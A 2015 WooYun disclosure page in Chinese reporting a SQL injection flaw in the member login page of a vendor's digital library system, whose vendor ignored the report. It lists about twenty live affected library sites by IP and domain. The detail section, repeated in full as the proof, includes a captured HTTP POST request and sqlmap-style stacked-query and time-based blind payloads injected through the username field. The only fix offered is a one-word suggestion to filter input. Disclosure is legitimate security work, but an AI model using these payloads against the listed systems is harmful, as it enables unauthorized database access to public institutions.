当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099142

漏洞标题:某数字图书馆系统通用SQL注入漏洞

相关厂商:迪创科技

漏洞作者: 路人甲

提交时间:2015-03-05 11:56

修复时间:2015-06-08 11:59

公开时间:2015-06-08 11:59

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-05: 细节已通知厂商并且等待厂商处理中
2015-03-10: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-05-04: 细节向核心白帽子及相关领域专家公开
2015-05-14: 细节向普通白帽子公开
2015-05-24: 细节向实习白帽子公开
2015-06-08: 细节向公众公开

简要描述:

某数字图书馆系统通用SQL注入漏洞

详细说明:

迪创科技开发的数字图书馆系统 ,存在通用的SQL注入漏洞。影响到各省市县、。。。
问题存在:userlogin.aspx(会员登陆处)
注入参数:ctl00$ContentPlaceHolder1$username
枚举部分案例如下:
石台县数字图书馆: http://220.180.89.90:8081/userlogin.aspx
资溪县数字图书馆:http://www.zixilib.com:8008/userlogin.aspx
东营市数字图书馆:http://dydl.sddylib.com/userlogin.aspx
市县管数字图书馆:http://ggg.360elib.com/userlogin.aspx
菏泽市数字图书馆:http://221.1.218.166:81/userlogin.aspx
数字图书馆:http://co.dichuang.cc:85/userlogin.aspx
朱巷中心校数字图书馆:http://218.23.126.222:999/userlogin.aspx
五河县数字图书馆:http://60.170.103.21:81/userlogin.aspx
樟树市数字图书馆:http://zslib.org:8000/userlogin.aspx
安徽涉外经济职业学校:http://211.141.185.166:82/userlogin.aspx
徐州市铜山区数字图书馆:http://www.tsqtsg.cn:88/userlogin.aspx
涡阳县数字图书馆:http://book.gyxtsg.org/userlogin.aspx
国家郑州经济技术开发区数字图书馆:http://120.194.7.10:8087/userlogin.aspx
http://www.zixilib.com:8008/userlogin.aspx
http://co.dichuang.cc:85/userlogin.aspx
http://220.180.89.90:8081/userlogin.aspx
http://www.tlzxx.net/tushu/userlogin.aspx
http://www.tsqtsg.cn:88/userlogin.aspx
http://120.194.7.10:8087/userlogin.aspx
具体测试截图部分:
以菏泽市数字图书馆:http://221.1.218.166:81/userlogin.aspx为例:

1.png


测试数据包:

POST /UserLogin.aspx HTTP/1.1
Host: 221.1.218.166:81
Proxy-Connection: keep-alive
Content-Length: 605
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://221.1.218.166:81
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://221.1.218.166:81/UserLogin.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=j3cber550ssl0w45zbfwbb45
__VIEWSTATE=%2FwEPDwUKMTgwMTUyODQ0Nw9kFgJmD2QWAgIDD2QWAgIBDw8WBB4EVGV4dAUGd2VhdmVyHgtOYXZpZ2F0ZVVybAURfi9NeUNvbnRyb2xzLmFzcHhkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUmY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRJbWFnZUJ1dHRvbjEFJmN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkSW1hZ2VCdXR0b24yPDBQnpd1L3Yb8T0JRUebj%2BvM2Uk%3D&__EVENTVALIDATION=%2FwEWBQLdjKLbCQKNo6vIDwLWrd%2BWCQK9vIn8DAK9vI38DEEMrO%2FNUAJvP10f9LsMMP%2B60%2BxC&ctl00%24ContentPlaceHolder1%24username=admin%27&ctl00%24ContentPlaceHolder1%24userpwd=1223456&ctl00%24ContentPlaceHolder1%24ImageButton1.x=66&ctl00%24ContentPlaceHolder1%24ImageButton1.y=15


测试结果:

Place: POST
Parameter: ctl00$ContentPlaceHolder1$username
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKMTgwMTUyODQ0Nw9kFgJmD2QWAgIDD2QWAgIBDw8WBB4EVGV
4dAUGd2VhdmVyHgtOYXZpZ2F0ZVVybAURfi9NeUNvbnRyb2xzLmFzcHhkZBgBBR5fX0NvbnRyb2xzUmV
xdWlyZVBvc3RCYWNrS2V5X18WAgUmY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRJbWFnZUJ1dHRvbjE
FJmN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkSW1hZ2VCdXR0b24yPDBQnpd1L3Yb8T0JRUebj+vM2Uk
=&__EVENTVALIDATION=/wEWBQLdjKLbCQKNo6vIDwLWrd+WCQK9vIn8DAK9vI38DEEMrO/NUAJvP10f
9LsMMP+60+xC&ctl00$ContentPlaceHolder1$username=admin'; WAITFOR DELAY '0:0:5'--&
ctl00$ContentPlaceHolder1$userpwd=1223456&ctl00$ContentPlaceHolder1$ImageButton1
.x=66&ctl00$ContentPlaceHolder1$ImageButton1.y=15
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKMTgwMTUyODQ0Nw9kFgJmD2QWAgIDD2QWAgIBDw8WBB4EVGV
4dAUGd2VhdmVyHgtOYXZpZ2F0ZVVybAURfi9NeUNvbnRyb2xzLmFzcHhkZBgBBR5fX0NvbnRyb2xzUmV
xdWlyZVBvc3RCYWNrS2V5X18WAgUmY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRJbWFnZUJ1dHRvbjE
FJmN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkSW1hZ2VCdXR0b24yPDBQnpd1L3Yb8T0JRUebj+vM2Uk
=&__EVENTVALIDATION=/wEWBQLdjKLbCQKNo6vIDwLWrd+WCQK9vIn8DAK9vI38DEEMrO/NUAJvP10f
9LsMMP+60+xC&ctl00$ContentPlaceHolder1$username=admin' WAITFOR DELAY '0:0:5'--&c
tl00$ContentPlaceHolder1$userpwd=1223456&ctl00$ContentPlaceHolder1$ImageButton1.
x=66&ctl00$ContentPlaceHolder1$ImageButton1.y=15
---


1.png


当前数据库信息:

1.png


漏洞证明:

迪创科技开发的数字图书馆系统 ,存在通用的SQL注入漏洞。影响到各省市县、。。。
问题存在:userlogin.aspx(会员登陆处)
注入参数:ctl00$ContentPlaceHolder1$username
枚举部分案例如下:
石台县数字图书馆: http://220.180.89.90:8081/userlogin.aspx
资溪县数字图书馆:http://www.zixilib.com:8008/userlogin.aspx
东营市数字图书馆:http://dydl.sddylib.com/userlogin.aspx
市县管数字图书馆:http://ggg.360elib.com/userlogin.aspx
菏泽市数字图书馆:http://221.1.218.166:81/userlogin.aspx
数字图书馆:http://co.dichuang.cc:85/userlogin.aspx
朱巷中心校数字图书馆:http://218.23.126.222:999/userlogin.aspx
五河县数字图书馆:http://60.170.103.21:81/userlogin.aspx
樟树市数字图书馆:http://zslib.org:8000/userlogin.aspx
安徽涉外经济职业学校:http://211.141.185.166:82/userlogin.aspx
徐州市铜山区数字图书馆:http://www.tsqtsg.cn:88/userlogin.aspx
涡阳县数字图书馆:http://book.gyxtsg.org/userlogin.aspx
国家郑州经济技术开发区数字图书馆:http://120.194.7.10:8087/userlogin.aspx
http://www.zixilib.com:8008/userlogin.aspx
http://co.dichuang.cc:85/userlogin.aspx
http://220.180.89.90:8081/userlogin.aspx
http://www.tlzxx.net/tushu/userlogin.aspx
http://www.tsqtsg.cn:88/userlogin.aspx
http://120.194.7.10:8087/userlogin.aspx
具体测试截图部分:
以菏泽市数字图书馆:http://221.1.218.166:81/userlogin.aspx为例:

1.png


测试数据包:

POST /UserLogin.aspx HTTP/1.1
Host: 221.1.218.166:81
Proxy-Connection: keep-alive
Content-Length: 605
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://221.1.218.166:81
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://221.1.218.166:81/UserLogin.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=j3cber550ssl0w45zbfwbb45
__VIEWSTATE=%2FwEPDwUKMTgwMTUyODQ0Nw9kFgJmD2QWAgIDD2QWAgIBDw8WBB4EVGV4dAUGd2VhdmVyHgtOYXZpZ2F0ZVVybAURfi9NeUNvbnRyb2xzLmFzcHhkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUmY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRJbWFnZUJ1dHRvbjEFJmN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkSW1hZ2VCdXR0b24yPDBQnpd1L3Yb8T0JRUebj%2BvM2Uk%3D&__EVENTVALIDATION=%2FwEWBQLdjKLbCQKNo6vIDwLWrd%2BWCQK9vIn8DAK9vI38DEEMrO%2FNUAJvP10f9LsMMP%2B60%2BxC&ctl00%24ContentPlaceHolder1%24username=admin%27&ctl00%24ContentPlaceHolder1%24userpwd=1223456&ctl00%24ContentPlaceHolder1%24ImageButton1.x=66&ctl00%24ContentPlaceHolder1%24ImageButton1.y=15


测试结果:

Place: POST
Parameter: ctl00$ContentPlaceHolder1$username
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKMTgwMTUyODQ0Nw9kFgJmD2QWAgIDD2QWAgIBDw8WBB4EVGV
4dAUGd2VhdmVyHgtOYXZpZ2F0ZVVybAURfi9NeUNvbnRyb2xzLmFzcHhkZBgBBR5fX0NvbnRyb2xzUmV
xdWlyZVBvc3RCYWNrS2V5X18WAgUmY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRJbWFnZUJ1dHRvbjE
FJmN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkSW1hZ2VCdXR0b24yPDBQnpd1L3Yb8T0JRUebj+vM2Uk
=&__EVENTVALIDATION=/wEWBQLdjKLbCQKNo6vIDwLWrd+WCQK9vIn8DAK9vI38DEEMrO/NUAJvP10f
9LsMMP+60+xC&ctl00$ContentPlaceHolder1$username=admin'; WAITFOR DELAY '0:0:5'--&
ctl00$ContentPlaceHolder1$userpwd=1223456&ctl00$ContentPlaceHolder1$ImageButton1
.x=66&ctl00$ContentPlaceHolder1$ImageButton1.y=15
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKMTgwMTUyODQ0Nw9kFgJmD2QWAgIDD2QWAgIBDw8WBB4EVGV
4dAUGd2VhdmVyHgtOYXZpZ2F0ZVVybAURfi9NeUNvbnRyb2xzLmFzcHhkZBgBBR5fX0NvbnRyb2xzUmV
xdWlyZVBvc3RCYWNrS2V5X18WAgUmY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRJbWFnZUJ1dHRvbjE
FJmN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkSW1hZ2VCdXR0b24yPDBQnpd1L3Yb8T0JRUebj+vM2Uk
=&__EVENTVALIDATION=/wEWBQLdjKLbCQKNo6vIDwLWrd+WCQK9vIn8DAK9vI38DEEMrO/NUAJvP10f
9LsMMP+60+xC&ctl00$ContentPlaceHolder1$username=admin' WAITFOR DELAY '0:0:5'--&c
tl00$ContentPlaceHolder1$userpwd=1223456&ctl00$ContentPlaceHolder1$ImageButton1.
x=66&ctl00$ContentPlaceHolder1$ImageButton1.y=15
---


1.png


当前数据库信息:

1.png


修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-08 11:59

厂商回复:

最新状态:

暂无


漏洞评价:

评论